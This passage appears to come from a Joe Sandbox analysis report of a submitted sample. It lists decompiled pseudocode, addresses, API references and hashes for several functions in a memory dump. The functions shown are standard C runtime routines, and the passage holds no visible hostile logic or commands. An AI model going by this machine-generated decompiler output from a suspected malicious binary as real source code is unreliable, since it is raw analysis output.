                                                                                                                                                                                                        											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                                                                                                                                                                        											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                                                                                                                                                                        											 *_t133 =  *_t133 + _t131;
                                                                                                                                                                                                        											_v12 = _v12 + _t131;
                                                                                                                                                                                                        											_t120 = _t120 - _t131;
                                                                                                                                                                                                        											_t134 = _t134 + 0x10;
                                                                                                                                                                                                        											_v8 = _v8 - _t131;
                                                                                                                                                                                                        											_t131 = _v20;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L39:
                                                                                                                                                                                                        										__eflags = _t120;
                                                                                                                                                                                                        									} while (_t120 != 0);
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t118 = _t90 | 0xffffffff;
                                                                                                                                                                                                        						_t90 = _t118 / _a12;
                                                                                                                                                                                                        						_t125 = _t118 % _a12;
                                                                                                                                                                                                        						__eflags = _a16 - _t90;
                                                                                                                                                                                                        						if(_a16 <= _t90) {
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t92 = E0040BFC1(_t138);
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					 *_t92 = 0x16;
                                                                                                                                                                                                        					_push(_t131);
                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        0x0040bcc2
                                                                                                                                                                                                        0x0040bcca
                                                                                                                                                                                                        0x0040bcce
                                                                                                                                                                                                        0x0040bcd3
                                                                                                                                                                                                        0x0040bcd5
                                                                                                                                                                                                        0x0040bcd8
                                                                                                                                                                                                        0x0040bcde
                                                                                                                                                                                                        0x0040bd01
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bce5
                                                                                                                                                                                                        0x0040bce5
                                                                                                                                                                                                        0x0040bce7
                                                                                                                                                                                                        0x0040bd08
                                                                                                                                                                                                        0x0040bd0b
                                                                                                                                                                                                        0x0040bd0d
                                                                                                                                                                                                        0x0040bd1c
                                                                                                                                                                                                        0x0040bd1c
                                                                                                                                                                                                        0x0040bd1f
                                                                                                                                                                                                        0x0040bd24
                                                                                                                                                                                                        0x0040bd29
                                                                                                                                                                                                        0x0040bd29
                                                                                                                                                                                                        0x0040bd2c
                                                                                                                                                                                                        0x0040bd2e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd30
                                                                                                                                                                                                        0x0040bd30
                                                                                                                                                                                                        0x0040bd35
                                                                                                                                                                                                        0x0040bd38
                                                                                                                                                                                                        0x0040bd3b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd3d
                                                                                                                                                                                                        0x0040bd40
                                                                                                                                                                                                        0x0040bd44
                                                                                                                                                                                                        0x0040bd4b
                                                                                                                                                                                                        0x0040bd4e
                                                                                                                                                                                                        0x0040bd50
                                                                                                                                                                                                        0x0040bd5a
                                                                                                                                                                                                        0x0040bd52
                                                                                                                                                                                                        0x0040bd55
                                                                                                                                                                                                        0x0040bd55
                                                                                                                                                                                                        0x0040bd61
                                                                                                                                                                                                        0x0040bd63
                                                                                                                                                                                                        0x0040be53
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd69
                                                                                                                                                                                                        0x0040bd69
                                                                                                                                                                                                        0x0040bd69
                                                                                                                                                                                                        0x0040bd70
                                                                                                                                                                                                        0x0040bdb6
                                                                                                                                                                                                        0x0040bdb6
                                                                                                                                                                                                        0x0040bdb9
                                                                                                                                                                                                        0x0040be24
                                                                                                                                                                                                        0x0040be2a
                                                                                                                                                                                                        0x0040be2d
                                                                                                                                                                                                        0x0040beb8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bebe
                                                                                                                                                                                                        0x0040be33
                                                                                                                                                                                                        0x0040be37
                                                                                                                                                                                                        0x0040be87
                                                                                                                                                                                                        0x0040be87
                                                                                                                                                                                                        0x0040be8b
                                                                                                                                                                                                        0x0040be95
                                                                                                                                                                                                        0x0040be9a
                                                                                                                                                                                                        0x0040be9a
                                                                                                                                                                                                        0x0040bea2
                                                                                                                                                                                                        0x0040beaa
                                                                                                                                                                                                        0x0040beab
                                                                                                                                                                                                        0x0040beac
                                                                                                                                                                                                        0x0040bead
                                                                                                                                                                                                        0x0040beae
                                                                                                                                                                                                        0x0040bcf9
                                                                                                                                                                                                        0x0040bcf9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bcfe
                                                                                                                                                                                                        0x0040be39
                                                                                                                                                                                                        0x0040be3c
                                                                                                                                                                                                        0x0040be3f
                                                                                                                                                                                                        0x0040be44
                                                                                                                                                                                                        0x0040be45
                                                                                                                                                                                                        0x0040be45
                                                                                                                                                                                                        0x0040be45
                                                                                                                                                                                                        0x0040be48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040be48
                                                                                                                                                                                                        0x0040bdbb
                                                                                                                                                                                                        0x0040bdbf
                                                                                                                                                                                                        0x0040bde0
                                                                                                                                                                                                        0x0040bde5
                                                                                                                                                                                                        0x0040bde7
                                                                                                                                                                                                        0x0040bde9
                                                                                                                                                                                                        0x0040bde9
                                                                                                                                                                                                        0x0040bdc1
                                                                                                                                                                                                        0x0040bdc8
                                                                                                                                                                                                        0x0040bdca
                                                                                                                                                                                                        0x0040bdd7
                                                                                                                                                                                                        0x0040bdd7
                                                                                                                                                                                                        0x0040bdd7
                                                                                                                                                                                                        0x0040bdda
                                                                                                                                                                                                        0x0040bdcc
                                                                                                                                                                                                        0x0040bdce
                                                                                                                                                                                                        0x0040bdd1
                                                                                                                                                                                                        0x0040bdd1
                                                                                                                                                                                                        0x0040bddc
                                                                                                                                                                                                        0x0040bddc
                                                                                                                                                                                                        0x0040bdeb
                                                                                                                                                                                                        0x0040bdee
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bdf4
                                                                                                                                                                                                        0x0040bdf4
                                                                                                                                                                                                        0x0040bdf5
                                                                                                                                                                                                        0x0040bdf9
                                                                                                                                                                                                        0x0040bdfe
                                                                                                                                                                                                        0x0040bdff
                                                                                                                                                                                                        0x0040be00
                                                                                                                                                                                                        0x0040be05
                                                                                                                                                                                                        0x0040be08
                                                                                                                                                                                                        0x0040be0a
                                                                                                                                                                                                        0x0040bec6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bec6
                                                                                                                                                                                                        0x0040be10
                                                                                                                                                                                                        0x0040be13
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040beb4
                                                                                                                                                                                                        0x0040be19
                                                                                                                                                                                                        0x0040be1c
                                                                                                                                                                                                        0x0040be1e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040be1e
                                                                                                                                                                                                        0x0040bdee
                                                                                                                                                                                                        0x0040bd72
                                                                                                                                                                                                        0x0040bd75
                                                                                                                                                                                                        0x0040bd77
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd7f
                                                                                                                                                                                                        0x0040bd81
                                                                                                                                                                                                        0x0040bd83
                                                                                                                                                                                                        0x0040bd85
                                                                                                                                                                                                        0x0040bd85
                                                                                                                                                                                                        0x0040bd87
                                                                                                                                                                                                        0x0040bd8a
                                                                                                                                                                                                        0x0040be5b
                                                                                                                                                                                                        0x0040be5d
                                                                                                                                                                                                        0x0040be61
                                                                                                                                                                                                        0x0040be6a
                                                                                                                                                                                                        0x0040be6f
                                                                                                                                                                                                        0x0040be6f
                                                                                                                                                                                                        0x0040be72
                                                                                                                                                                                                        0x0040be77
                                                                                                                                                                                                        0x0040be78
                                                                                                                                                                                                        0x0040be79
                                                                                                                                                                                                        0x0040be7a
                                                                                                                                                                                                        0x0040be7b
                                                                                                                                                                                                        0x0040be81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd90
                                                                                                                                                                                                        0x0040bd99
                                                                                                                                                                                                        0x0040bd9e
                                                                                                                                                                                                        0x0040bda1
                                                                                                                                                                                                        0x0040bda3
                                                                                                                                                                                                        0x0040bda6
                                                                                                                                                                                                        0x0040bda8
                                                                                                                                                                                                        0x0040bdab
                                                                                                                                                                                                        0x0040bdae
                                                                                                                                                                                                        0x0040bdae
                                                                                                                                                                                                        0x0040be4b
                                                                                                                                                                                                        0x0040be4b
                                                                                                                                                                                                        0x0040be4b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd69
                                                                                                                                                                                                        0x0040bd63
                                                                                                                                                                                                        0x0040bd2e
                                                                                                                                                                                                        0x0040bd0f
                                                                                                                                                                                                        0x0040bd14
                                                                                                                                                                                                        0x0040bd14
                                                                                                                                                                                                        0x0040bd17
                                                                                                                                                                                                        0x0040bd1a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bd1a
                                                                                                                                                                                                        0x0040bce9
                                                                                                                                                                                                        0x0040bce9
                                                                                                                                                                                                        0x0040bcee
                                                                                                                                                                                                        0x0040bcef
                                                                                                                                                                                                        0x0040bcf0
                                                                                                                                                                                                        0x0040bcf1
                                                                                                                                                                                                        0x0040bcf2
                                                                                                                                                                                                        0x0040bcf8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bcf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3886058894-0
                                                                                                                                                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                        			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t30 = __eflags;
                                                                                                                                                                                                        				_t26 = __edi;
                                                                                                                                                                                                        				_t25 = __edx;
                                                                                                                                                                                                        				_t22 = __ebx;
                                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                                        				_push(0x4214d0);
                                                                                                                                                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                        				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                        				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                        					E0040D6E0(_t22, 0xc);
                                                                                                                                                                                                        					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                        					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                        					_t26 =  *0x422f18; // 0x422e40
                                                                                                                                                                                                        					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
                                                                                                                                                                                                        					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                        					E004147A2();
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                        					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					E0040E79A(_t25, _t26, 0x20);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E0040E21D(_t28);
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x00414738
                                                                                                                                                                                                        0x00414738
                                                                                                                                                                                                        0x00414738
                                                                                                                                                                                                        0x00414738
                                                                                                                                                                                                        0x00414738
                                                                                                                                                                                                        0x0041473a
                                                                                                                                                                                                        0x0041473f
                                                                                                                                                                                                        0x00414749
                                                                                                                                                                                                        0x0041474b
                                                                                                                                                                                                        0x00414753
                                                                                                                                                                                                        0x00414777
                                                                                                                                                                                                        0x00414779
                                                                                                                                                                                                        0x0041477f
                                                                                                                                                                                                        0x00414783
                                                                                                                                                                                                        0x00414786
                                                                                                                                                                                                        0x00414791
                                                                                                                                                                                                        0x00414794
                                                                                                                                                                                                        0x0041479b
                                                                                                                                                                                                        0x00414755
                                                                                                                                                                                                        0x00414755
                                                                                                                                                                                                        0x00414759
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041475b
                                                                                                                                                                                                        0x00414760
                                                                                                                                                                                                        0x00414760
                                                                                                                                                                                                        0x00414759
                                                                                                                                                                                                        0x00414765
                                                                                                                                                                                                        0x00414769
                                                                                                                                                                                                        0x0041476e
                                                                                                                                                                                                        0x00414776

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                        • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                        • String ID: @.B
                                                                                                                                                                                                        • API String ID: 3521780317-470711618
                                                                                                                                                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				intOrPtr _t19;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				intOrPtr _t39;
                                                                                                                                                                                                        				intOrPtr _t40;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t37 = __edx;
                                                                                                                                                                                                        				_push(8);
                                                                                                                                                                                                        				_push(0x421140);
                                                                                                                                                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t39 = _a4;
                                                                                                                                                                                                        				_t50 = _t39;
                                                                                                                                                                                                        				_t51 = _t50 != 0;
                                                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                                                        					E0040FB29(_t39);
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                                                                                                        					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                        					__eflags = _t16 - 0xffffffff;
                                                                                                                                                                                                        					if(_t16 == 0xffffffff) {
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						_t17 = 0x4227e0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                        						__eflags = _t21 - 0xfffffffe;
                                                                                                                                                                                                        						if(_t21 == 0xfffffffe) {
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                        							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t9 = _t17 + 4; // 0xa80
                                                                                                                                                                                                        					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                                                                                                        					_v8 = 0xfffffffe;
                                                                                                                                                                                                        					E0040C735(_t39);
                                                                                                                                                                                                        					_t19 = 0;
                                                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = E0040BFC1(_t51);
                                                                                                                                                                                                        					_t40 = 0x16;
                                                                                                                                                                                                        					 *_t27 = _t40;
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					E0040E744(__edx, _t40, 0);
                                                                                                                                                                                                        					_t19 = _t40;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E0040E21D(_t19);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x0040c73d
                                                                                                                                                                                                        0x0040c690
                                                                                                                                                                                                        0x0040c692
                                                                                                                                                                                                        0x0040c697
                                                                                                                                                                                                        0x0040c69e
                                                                                                                                                                                                        0x0040c6a3
                                                                                                                                                                                                        0x0040c6a8
                                                                                                                                                                                                        0x0040c6aa
                                                                                                                                                                                                        0x0040c6c8
                                                                                                                                                                                                        0x0040c6ce
                                                                                                                                                                                                        0x0040c6d1
                                                                                                                                                                                                        0x0040c6d6
                                                                                                                                                                                                        0x0040c6dc
                                                                                                                                                                                                        0x0040c6df
                                                                                                                                                                                                        0x0040c70f
                                                                                                                                                                                                        0x0040c70f
                                                                                                                                                                                                        0x0040c6e1
                                                                                                                                                                                                        0x0040c6e2
                                                                                                                                                                                                        0x0040c6e8
                                                                                                                                                                                                        0x0040c6eb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040c6ed
                                                                                                                                                                                                        0x0040c6ee
                                                                                                                                                                                                        0x0040c70b
                                                                                                                                                                                                        0x0040c70b
                                                                                                                                                                                                        0x0040c6eb
                                                                                                                                                                                                        0x0040c714
                                                                                                                                                                                                        0x0040c71b
                                                                                                                                                                                                        0x0040c71e
                                                                                                                                                                                                        0x0040c725
                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                        0x0040c6ac
                                                                                                                                                                                                        0x0040c6ac
                                                                                                                                                                                                        0x0040c6b3
                                                                                                                                                                                                        0x0040c6b4
                                                                                                                                                                                                        0x0040c6b6
                                                                                                                                                                                                        0x0040c6b7
                                                                                                                                                                                                        0x0040c6b8
                                                                                                                                                                                                        0x0040c6b9
                                                                                                                                                                                                        0x0040c6ba
                                                                                                                                                                                                        0x0040c6bb
                                                                                                                                                                                                        0x0040c6c3
                                                                                                                                                                                                        0x0040c6c3
                                                                                                                                                                                                        0x0040c731

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2805327698-0
                                                                                                                                                                                                        • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                                                        			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				LONG* _t21;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                                        				LONG* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t35 = __eflags;
                                                                                                                                                                                                        				_t29 = __edx;
                                                                                                                                                                                                        				_t25 = __ebx;
                                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                                        				_push(0x421490);
                                                                                                                                                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                                                                                                                                                        				_t15 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                        					E0040D6E0(_t25, 0xd);
                                                                                                                                                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                        					__eflags = _t33 -  *0x422d38; // 0x21a1638
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 != 0) {
                                                                                                                                                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        							if(_t23 == 0) {
                                                                                                                                                                                                        								__eflags = _t33 - 0x422910;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									_push(_t33);
                                                                                                                                                                                                        									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 =  *0x422d38; // 0x21a1638
                                                                                                                                                                                                        						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                        						_t33 =  *0x422d38; // 0x21a1638
                                                                                                                                                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                        						InterlockedIncrement(_t33);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                        					E00414067();
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t33 == 0) {
                                                                                                                                                                                                        					E0040E79A(_t29, _t31, 0x20);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E0040E21D(_t33);
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        0x00413fcc
                                                                                                                                                                                                        0x00413fcc
                                                                                                                                                                                                        0x00413fcc
                                                                                                                                                                                                        0x00413fcc
                                                                                                                                                                                                        0x00413fce
                                                                                                                                                                                                        0x00413fd3
                                                                                                                                                                                                        0x00413fdd
                                                                                                                                                                                                        0x00413fdf
                                                                                                                                                                                                        0x00413fe7
                                                                                                                                                                                                        0x00414008
                                                                                                                                                                                                        0x0041400e
                                                                                                                                                                                                        0x00414012
                                                                                                                                                                                                        0x00414015
                                                                                                                                                                                                        0x00414018
                                                                                                                                                                                                        0x0041401e
                                                                                                                                                                                                        0x00414020
                                                                                                                                                                                                        0x00414022
                                                                                                                                                                                                        0x00414025
                                                                                                                                                                                                        0x0041402b
                                                                                                                                                                                                        0x0041402d
                                                                                                                                                                                                        0x0041402f
                                                                                                                                                                                                        0x00414035
                                                                                                                                                                                                        0x00414037
                                                                                                                                                                                                        0x00414038
                                                                                                                                                                                                        0x0041403d
                                                                                                                                                                                                        0x00414035
                                                                                                                                                                                                        0x0041402d
                                                                                                                                                                                                        0x0041403e
                                                                                                                                                                                                        0x00414043
                                                                                                                                                                                                        0x00414046
                                                                                                                                                                                                        0x0041404c
                                                                                                                                                                                                        0x00414050
                                                                                                                                                                                                        0x00414050
                                                                                                                                                                                                        0x00414056
                                                                                                                                                                                                        0x0041405d
                                                                                                                                                                                                        0x00413fef
                                                                                                                                                                                                        0x00413fef
                                                                                                                                                                                                        0x00413fef
                                                                                                                                                                                                        0x00413ff4
                                                                                                                                                                                                        0x00413ff8
                                                                                                                                                                                                        0x00413ffd
                                                                                                                                                                                                        0x00414005

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                        • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(021A1638), ref: 00414050
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
